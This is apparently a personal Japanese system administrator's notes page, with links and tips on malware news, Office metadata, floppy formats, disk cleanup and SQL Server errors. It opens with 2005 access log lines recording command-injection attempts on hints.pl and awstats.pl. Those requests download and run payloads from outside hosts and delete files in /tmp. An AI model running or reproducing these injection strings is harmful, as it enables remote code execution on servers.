2005-11-04 22:28:45 61.194.16.3 GET /cgi-bin/hints.pl |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:46 61.194.16.4 GET /scgi-bin/hints.pl |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:46 61.194.16.3 GET /scgi-bin/hints.pl |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:47 61.194.16.4 GET /hints/hints.pl |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:47 61.194.16.3 GET /hints/hints.pl |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:48 61.194.16.4 GET /cgi-bin/hints/hints.pl |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:48 61.194.16.3 GET /cgi-bin/hints/hints.pl |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:50 61.194.16.4 GET /scgi-bin/hints/hints.pl |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:50 61.194.16.3 GET /scgi-bin/hints/hints.pl |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:51 61.194.16.4 GET /webhints/hints.pl |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:51 61.194.16.3 GET /webhints/hints.pl |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:52 61.194.16.4 GET /cgi-bin/webhints/hints.pl |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:52 61.194.16.3 GET /cgi-bin/webhints/hints.pl |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:53 61.194.16.4 GET /scgi-bin/webhints/hints.pl |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:53 61.194.16.3 GET /scgi-bin/webhints/hints.pl |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:54 61.194.16.4 GET /hints.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:54 61.194.16.3 GET /hints.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:55 61.194.16.4 GET /cgi/hints.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:55 61.194.16.3 GET /cgi/hints.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:56 61.194.16.4 GET /scgi/hints.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:56 61.194.16.3 GET /scgi/hints.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:57 61.194.16.4 GET /cgi-bin/hints.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:57 61.194.16.3 GET /cgi-bin/hints.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:59 61.194.16.4 GET /scgi-bin/hints.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:28:59 61.194.16.3 GET /scgi-bin/hints.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:29:00 61.194.16.4 GET /hints/hints.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:29:00 61.194.16.3 GET /hints/hints.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:29:01 61.194.16.4 GET /cgi-bin/hints/hints.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:29:01 61.194.16.3 GET /cgi-bin/hints/hints.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:29:02 61.194.16.4 GET /scgi-bin/hints/hints.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:29:02 61.194.16.3 GET /scgi-bin/hints/hints.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:29:03 61.194.16.4 GET /webhints/hints.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:29:03 61.194.16.3 GET /webhints/hints.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:29:04 61.194.16.4 GET /cgi-bin/webhints/hints.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:29:04 61.194.16.3 GET /cgi-bin/webhints/hints.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:29:05 61.194.16.4 GET /scgi-bin/webhints/hints.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-04 22:29:05 61.194.16.3 GET /scgi-bin/webhints/hints.cgi |cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`62.101.193.244| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64
2005-11-05 01:39:19 61.194.16.3 GET /cgi-bin/awstats.pl configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20members.lycos.co.uk/sugi/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| 80 - 219.166.34.48 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) - - 401 2 64
2005-11-05 01:39:19 61.194.16.3 GET /awstats/awstats.pl configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20members.lycos.co.uk/sugi/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| 80 - 219.166.34.48 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) - - 401 2 64
2005-11-05 01:39:19 61.194.16.3 GET /cgi/awstats.pl configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20members.lycos.co.uk/sugi/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| 80 - 219.166.34.48 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) - - 401 2 64
2005-11-05 01:39:19 61.194.16.3 GET /stats/awstats.pl configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20members.lycos.co.uk/sugi/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| 80 - 219.166.34.48 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) - - 401 2 64
2005-11-05 01:39:19 61.194.16.3 GET /stats/awstats/awstats.pl configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20members.lycos.co.uk/sugi/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| 80 - 219.166.34.48 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) - - 401 2 64
2005-11-05 01:39:19 61.194.16.3 GET /stats/cgi-bin/awstats.pl configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20members.lycos.co.uk/sugi/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| 80 - 219.166.34.48 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) - - 401 2 64
2005-11-05 01:39:20 61.194.16.4 GET /cgi-bin/awstats.pl configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20members.lycos.co.uk/sugi/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| 80 - 219.166.34.48 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) - - 401 2 64
2005-11-05 01:39:20 61.194.16.4 GET /awstats/awstats.pl configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20members.lycos.co.uk/sugi/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| 80 - 219.166.34.48 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) - - 401 2 64
2005-11-05 01:39:20 61.194.16.4 GET /cgi/awstats.pl configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20members.lycos.co.uk/sugi/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| 80 - 219.166.34.48 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) - - 401 2 64
2005-11-05 01:39:20 61.194.16.4 GET /stats/awstats.pl configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20members.lycos.co.uk/sugi/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| 80 - 219.166.34.48 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) - - 401 2 64
2005-11-05 01:39:20 61.194.16.4 GET /stats/awstats/awstats.pl configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20members.lycos.co.uk/sugi/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| 80 - 219.166.34.48 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) - - 401 2 64
2005-11-05 01:39:20 61.194.16.4 GET /stats/cgi-bin/awstats.pl configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20members.lycos.co.uk/sugi/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| 80 - 219.166.34.48 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) - - 401 2 64
ボットは一点突破の“スピア型ウイルス”、ISPも対応に苦慮
http://internet.watch.impress.co.jp/cda/event/2005/12/09/10168.html
対策のしおり
- ウイルス対策、ボット対策、スパイウェア対策 -
http://www.ipa.go.jp/security/antivirus/shiori.html
スパイウエアで金銭的被害に遭ったらどうすればよい / デジタルARENA
http://arena.nikkeibp.co.jp/qa/20051222/114843/
ルートキットの正体を暴く(前編)
http://itpro.nikkeibp.co.jp/article/Windows/20060117/227369/
ルートキットの正体を暴く(後編)
http://itpro.nikkeibp.co.jp/article/Windows/20060117/227370/
--------------------------------------------------------------------
アクセスログで YAHOO のリファラ見たら
NOD32 でトロイ検出されたんですけど…
↓これ。ウイルスは IRC/Wlah.A トロイ(2005.12.12 20:20)
http://search.yahoo.co.jp/search?p=SQL%E6%96%87+CONVERT&src=top&search_x=19&search_y=14&ei=UTF-8&pstart=1&fr=top&b=11
UTF-7エンコードされたタグ文字列によるXSS脆弱性に注意
http://slashdot.jp/security/article.pl?sid=05/12/21/2318216
YAHOO の検索結果がこんな動きする場合が在ったような……
--------------------------------------------------------------------
余ったCPUパワーでお小遣い稼ぎ?! フレッツユーザのPCをグリッドとして提供へ
http://www.rbbtoday.com/news/20051221/27938.html
ほほぅ…
--------------------------------------------------------------------
メタデータにご用心
Windows Vistaのメタデータにご用心
http://www.itmedia.co.jp/news/articles/0512/26/news026.html
Office 系
米ソフトメーカー、MS Officeメタデータの危険性を警告
http://japan.cnet.com/news/ent/story/0,2000047623,20070887,00.htm
消し忘れに注意?--MS Wordの機能からアシの付いたSCOの「幻の訴訟」
http://japan.cnet.com/news/ent/story/0,2000047623,20064698,00.htm
[WD97] Microsoft Word 文書のメタデータを最小限に抑える方法
http://support.microsoft.com/default.aspx?scid=kb;ja;JP223790
[HOWTO] Microsoft Word 2000 文書のメタデータを最小限にする方法
http://support.microsoft.com/default.aspx?scid=kb;JA;237361
PowerPoint 2003 プレゼンテーションのメタデータを最小限に抑える方法
http://support.microsoft.com/default.aspx?scid=kb;ja;826825
Word、Excel、PowerPoint が作る文書ファイルに保存される「メタデータ」を削除するツール
834427 - [OFF2003] Office 2003 および Office XP 用 Remove Hidden Data アドイン
http://support.microsoft.com/default.aspx?scid=kb;ja;834427
この削除ツールで消す事の出来るデータ
・以前の作成者と編集者
・ユーザー名
・個人の詳細情報
・削除された文字列
・非表示の行または列
・ファイルのパス
・外部データソースへのリンク
・回覧先
まだ続いている“不十分な黒塗りデータ”からの情報漏えい
http://itpro.nikkeibp.co.jp/article/COLUMN/20080909/314475/
Hosting
マイクロソフト、Hosting Partner Program の開始を発表
http://www.microsoft.com/japan/presspass/detail.aspx?newsid=2520
Visual Studio 2005 対応のレンタルサーバーサービスを来春より順次提供
http://www.microsoft.com/japan/presspass/detail.aspx?newsid=2496
Windows 98 以前でフォーマットしている FD を XP で認識させる方法
FD のブートセクタにメディアタイプを識別する為の識別子が付いてないだけで
この識別子を付けてあげる事により認識するようになります。
具体的には、ブートセクタ内の「BIOSパラメータブロック(BPB)」と呼ばれる領域の
オフセット21(15h)に値をセットします。
MS-DOS、Windows 3.1/95 の フォーマットコマンドはこの値をセットしません。
0x015
F0 2.88 MB 3.5 インチ、両面、36 セクタ
F0 1.44 MB 3.5 インチ、両面、18 セクタ
F9 720 KB 3.5 インチ、両面、9 セクタ
F9 1.2 MB 5.25 インチ、両面、15 セクタ
FD 360 KB 5.25 インチ、両面、9 セクタ
FF 360 KB 5.25 インチ、両面、8 セクタ
FC 180 KB 5.25 インチ、片面、9 セクタ
FE 160 KB 5.25 インチ、片面、8 セクタ
FE 250 KB 8 インチ、片面、単密度
FD 500 KB 8 インチ、両面、単密度
FE 1.2 MB 8 インチ、両面、倍密度
F8 ----- ハード ディスク
※ 下手に書き換えると FD が破壊されますのでご注意を。
バイナリエディタ( Dskprobe.exe )はサポートツール(Windows XP の CD) の中に入っています。
(インストール時に標準を選択すると、インストールされませんので完全を選択して下さい)
バイナリエディタはフリーの Stirling.exe 等を利用すると良いかも。(調べてないので FD にアクセスできるか不明)
http://www.vector.co.jp/vpack/filearea/win95/util/bin/edit/index.html
参考
Windows でフロッピー ディスクへのアクセス、フォーマット、または認識ができない
http://support.microsoft.com/?scid=kb;ja;140060&spid=1139&sid=312
MS-DOSで作成したファイル、フォルダ名にDBCS小文字がある場合アクセス不可
http://support.microsoft.com/kb/288132/ja
ファイル名拡張子に関する懸念と対策について (前編)
http://www.microsoft.com/japan/technet/security/secnews/columns/column060125.mspx
年末なので PCもお掃除
ウイルスチェック
・アンチウイルスはお好きなのを。
NOD32 とか カスペルスキーとか。
新エンジンで動作速度や検出力向上を図った「NOD32 アンチウイルス」
http://internet.watch.impress.co.jp/cda/news/2008/05/20/19619.html
常駐させてもめちゃくちゃ軽快に動作する総合セキュリティソフト「イーセット スマート セキュリティ」
http://gigazine.net/index.php?/news/comments/20080519_eset_smart_security/
「NOD32」と「ESET Smart Security」比較使用体験記 (1)
https://www.netsecurity.ne.jp/3_11171.html
「NOD32」と「ESET Smart Security」比較使用体験記 (2)
https://www.netsecurity.ne.jp/3_11198.html
「AVG Anti-Virus Free Edition 8 日本語版」無料配布開始
http://journal.mycom.co.jp/news/2008/04/25/012/index.html
スパイウェア駆除
Spybot - Search & Destroy 1.4
http://www.altech-ads.com/product/10001045.htm
同じ物をキヤノンシステムソリューションズが販売している訳ですが……
http://canon-sol.jp/product/sb/index.html
不要なレジストリキーを削除
NTREGOPT
http://www.larshederer.homepage.t-online.de/erunt/index.htm
他にも便利なものが在るかも。
ディスクのクリーンアップ
ディスク クリーンアップがいつまで経っても終わらない場合
→ 「古いファイルの圧縮」の場所を示すレジストリエントリが破損している
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches
値の名前 : Compress old files
をザクッと削除して、再度クリーンアップを実行。
最後にデフラグ。
デフラグも HD に負荷がかかりますのでやりすぎにはご注意。
XP/2003 は標準のデフラグをコマンドから実行可能ですので、タスクに登録して定期的に実行する事も出来ます。
詳しくは c:\>Defrag /? で確認。
ついでに ASR(自動システム回復:Automated System Recovery) でバックアップ。
※ ただし FDドライブが無いと利用できません。
ディスクの最適化による最大限の Windows 2000 パフォーマンスの維持
http://www.microsoft.com/japan/technet/prodtechnol/windows2000serv/maintain/optimize/w2kexec.mspx
HDDは高温になっても大丈夫?
http://arena.nikkeibp.co.jp/qa/parts/20050727/112945/
ハードディスクそのもののデータは守れないか
http://www.nikkeibp.co.jp/sj/special/199/index.html
ハードディスク・ドライブの故障率に関する事実
http://itpro.nikkeibp.co.jp/article/COLUMN/20070529/272852/
断片化を爆速で処理する無料デフラグソフト「Auslogics Disk Defrag」
http://gigazine.net/index.php?/news/comments/20070619_auslogics_disk_defrag/
Fire File Copy
http://www.forest.impress.co.jp/lib/sys/file/syncbackup/firefilecopy.html
ディスク関連
Windows Server 2003 ベースのコンピュータでのダイナミック ディスクの使用に関する推奨事例
http://support.microsoft.com/kb/816307/ja
ベーシック と ダイナミック
http://www.atmarkit.co.jp/fwin2k/operation/diskmanagement/diskman01.html
SQL Enterprise manager からジョブの削除を行った際に
エラー 14274
MSXサーバーからのジョブ、ステップ、スケジュールの追加、更新、または削除は出来ません。
と出た場合の対策。
原因
SQL Server がインストールされているコンピュータ名を変更したばあいに発生します。
ジョブを削除するには、名前を元に戻すしか方法が無いようです。
[PRB] サーバーの名前を変更した後で SQL Server エージェント ジョブを更新するとエラー 14274 が発生する
http://support.microsoft.com/default.aspx?scid=kb;ja;281642
あと、コンピュータ名を変更後に
sp_dropserver '旧コンピュータ名'
go
sp_addserver '新コンピュータ名','local' 又は 'remote'
go
この操作を行っても SQL Enterprise managerに登録されているコンピュータ名は自動的に変更されないそうなので
SQL Enterprise Managerで変更後のコンピュータ名を追加し、変更前のコンピュータ名を削除する。
リモートコンピュータ又はローカルコンピュータ名はSQLServerではmaster.dbo.sysserversテーブルに格納されており
Windows Server のコンピュータ名を変更した場合には、このテーブルを更新する必要がある。
その為に sp_dropserver、sp_addserverプロシジャーを実行する必要がある。
Windows Vista または Windows Server 2008 の初期セットアップ中に 15 bytes を超えるコンピュータ名を入力すると、多くのサービスが開始されません。
http://support.microsoft.com/kb/969902
Windows はコンピュータ名を変更したり、長すぎたりすると
ろくな事になりませんのでご注意。
「入力した値は、列のデータ型またはデータ長と一致しないか、グリッド バッファの制限を越えています。」
と出た場合の対策。
♠ ♣ ♥ ♦ © ® ↔ ↵
SQL Server へ上記 symbol フォントを char フィールドに保存しようとすると表示されるようです。
Unicode文字列型 だと保存できます。
イベントの種類: 警告
イベント ソース: Win32k
イベント カテゴリ: なし
イベント ID: 243
説明:
デスクトップ ヒープの割り当てに失敗しました。
うむぅ…
無視して構わないのか、レジストリを操作するべきなのか…
Microsoft Windows 2000 でデスクトップ ヒープがなくなるならば、新しいシステム ログ エントリが生成されていません。
http://support.microsoft.com/default.aspx?scid=kb%3Bja%3B810807
Windows Server 2003 または Windows 2000 を実行しているコンピュータから
MPSReport へのエラー アプリケーションまたは DLL C:\Windows\System32\win32k.sysが有効な
Windows イメージなのを表示することがあります。
http://support.microsoft.com/?scid=kb;ja;907300&spid=1131&sid=813
印刷がタイムアウトする場合の対策
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LPDSVC\Parameters
値の名前 : RecvTimeout
データの種類 : REG_DWORD
データの値 : 1 〜 1200 (秒)
デフォルトが 60秒 だから、 180秒とかにしてみる。
参考
Windows Server 2003 および Windows 2000 Server で大きな印刷ジョブが 60 秒でタイムアウトする
http://support.microsoft.com/kb/280344/ja
Windows Server 2003 Resource Kit の中に linkspeed と言うツールがあるそうで
このツールは、2つのホスト間の接続を計測できるようです。
リモートデスクトップや、Active Directory で認証が上手く行かない場合にリンク速度を測定してみましょって事で。
ローカルシステムからリモートシステムに対して、以下のコマンドを実行
> linkspeed /s \\サーバー名
> linkspeed /s サーバーの DNS 名
ドメインコントローラをテストする場合は
> linkspeed /dc
このツールはターゲットマシンも Windows 2003 である場合に最も効果を発揮。
Windows Deployment and Resource Kits http://www.microsoft.com/windows/reskits/
参考
Windowsサーバークックブック― ネットワーク管理者のためのレシピ集 P53 より
Gマイル・ドットコム http://www.g-mile.com/
cgi エラー出たので報告したら以下の回答が…
|平素はGマイル・ドットコムをご利用いただき、誠に
|ありがとうございます。
|
|さて、先般ご指摘いただきましたエラーメッセージにつきまして
|次のとおりご回答申し上げます。
|
|エラー表示は、ブラウザのポップアップブロック機能を
|有効にしている場合に発生いたします。
|ご登録時、一時的にポップアップブロック機能を有効に
|していただくと問題は発生しませんが、ポップアップ
|ブロックが普及している現状下、同じ問題が発生しうる
